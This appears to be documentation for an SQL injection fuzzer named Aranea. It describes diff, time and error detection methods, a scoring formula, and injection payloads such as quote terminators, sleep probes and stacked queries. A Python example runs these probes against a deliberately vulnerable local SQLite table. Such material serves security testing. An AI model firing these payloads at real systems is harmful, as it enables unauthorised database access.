Aranea / Semantic SQL Fuzzer
Detection
Methods
- diff (boolean differential: send the same request with 1=1 and with 1=0 and compare the two responses; the output only changes when the database actually evaluates the injected condition)
- time (non-intrusive delay: 1=sleep(15); the signal is the response time, so it works even when nothing from the query is reflected in the output)
- error (trigger a driver error with an unbalanced quote: 1='; the signal is the database or driver error surfacing in the response)
Rating
We rate an engine's detection capability by the number of semantic constructions it covers (across all SQL databases, not just one dialect), weighted by how well it detects each construction, divided by the total number of queries it issues per fuzzing session plus the extra queries needed to exclude false positives completely. The score therefore rewards coverage and penalises query volume: an engine that needs many confirmation requests to rule out a false positive pays for them in the denominator.
The formula:
covered_semantic_constructions / (( total_fuzzable_queries + extra_queries_to_exclude_false_positives ) * ( all_standard_semantic_constructions + all_non_standard_semantic_constructions ))
Common SQL Constructions
Select
- select * from [column], where [column] is the injected identifier
  - unquoted identifier: select * from column
  - backtick-quoted identifier: select * from `column`
  - closing the backtick and appending a statement: original` query; -- -
  - stacked statement after the original value: original; query
- where-clause probes: where 1=1, where 1=0, where 1=', where 1=sleep(15), select sleep(15);
- quote and parenthesis terminators (the original value followed by the closing sequence the surrounding query may need):
  original, original', original'), original')), original'))), original", original"), original")), original"))), original), original)), original)))
- stacked query: ; query
- statement shapes the fuzzer has to cover:
  - select user,password from column where id=1 limit 1,1
  - insert into t set a=1
  - insert into t ( a ) values ( 1 )
  - update t set a=1 where id=1
Fuzzlist
- append where 1=1
- append where 1=0
- append where 1='
- append where 1=sleep(15);
- append` where 1=1
- append` where 1=0
- append` where 1='
- append` where 1=sleep(15);
- append; select sleep(15);
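The following is an added worked example, not Aranea's own code, that runs the three detection methods from the Methods list across the quote and parenthesis terminators from the constructions table. The target is a constructed, deliberately vulnerable SQLite lookup (the `Target` class, its `users` table and the value `alice` are assumptions of this example); a `sleep()` function is registered on the connection to stand in for MySQL's `sleep()`, the delay is scaled down from 15 s to 0.3 s, and `and` is used instead of the page's `where` because this injection point already sits inside a WHERE clause.

```python
import sqlite3
import time

# Terminators from the constructions table: the injected value may sit in no
# quotes, single or double quotes, followed by up to three closing parentheses.
CONTEXTS = ["", "'", "')", "'))", "')))", '"', '")', '"))', '")))', ")", "))", ")))"]
COMMENT = " -- -"   # the page's comment sequence, neutralises whatever follows
SLEEP_S = 0.3       # scaled down from sleep(15) so the example runs in about a second


class Target:
    """Constructed, deliberately vulnerable endpoint (not Aranea code): a SQLite
    table queried with the user value interpolated inside single quotes, so the
    real injection context is the table's `original'` terminator."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("create table users (id integer, name text)")
        self.conn.executemany("insert into users values (?, ?)",
                              [(1, "alice"), (2, "bob")])
        # SQLite has no sleep(); register one standing in for MySQL's sleep()
        self.conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
        self.queries = 0  # counted because the Rating formula charges per query

    def lookup(self, user_input):
        """Returns (rows, driver_error). Vulnerable on purpose: no parameters."""
        self.queries += 1
        sql = f"select id, name from users where name = '{user_input}'"
        try:
            return self.conn.execute(sql).fetchall(), None
        except sqlite3.Error as e:
            return None, str(e)


def fuzz(target, original="alice", sleep_s=SLEEP_S):
    """Run the diff, error and time probes for every terminator and return the
    (context, method) pairs that fired. Assumption of this example: `and` is
    appended instead of `where` because the value is already inside a WHERE."""
    hits = []
    for ctx in CONTEXTS:
        base = f"{original}{ctx}"
        # diff: same request with a true and a false condition; a change in the
        # rows or in the error text means the database evaluated our condition
        true_resp = target.lookup(f"{base} and 1=1{COMMENT}")
        false_resp = target.lookup(f"{base} and 1=0{COMMENT}")
        if true_resp != false_resp:
            hits.append((ctx, "diff"))
        # error: the unbalanced terminator alone (the page's 1=' idea) surfaces
        # a driver error whenever the quote type matches the real query
        if target.lookup(base)[1] is not None:
            hits.append((ctx, "error"))
        # time: the only signal is elapsed time, so no reflected output is needed
        started = time.monotonic()
        target.lookup(f"{base} and 1=sleep({sleep_s}){COMMENT}")
        if time.monotonic() - started >= 0.9 * sleep_s:
            hits.append((ctx, "time"))
    return hits


def by_method(hits, method):
    """Contexts confirmed by one method, in table order."""
    return [ctx for ctx, m in hits if m == method]


if __name__ == "__main__":
    t = Target()
    found = fuzz(t)
    for ctx, method in found:
        print(f"terminator {ctx!r:7} confirmed by {method}")
    print(f"{t.queries} queries spent (4 per terminator)")
```

Running it shows why the page counts extra queries for excluding false positives: the error probe fires for every single-quote terminator (`'`, `')`, `'))`, `')))`) because an unbalanced quote breaks the statement regardless of the parenthesis depth, while diff and time only fire for the one terminator that actually closes the surrounding query. An engine that stopped at the error signal would report four candidates and need follow-up queries to narrow them down. Note also that `sleep()` is MySQL's spelling; other engines need their own delay function (for example `pg_sleep()` in PostgreSQL), which is what "all sql databases" in the Rating section implies for the time method.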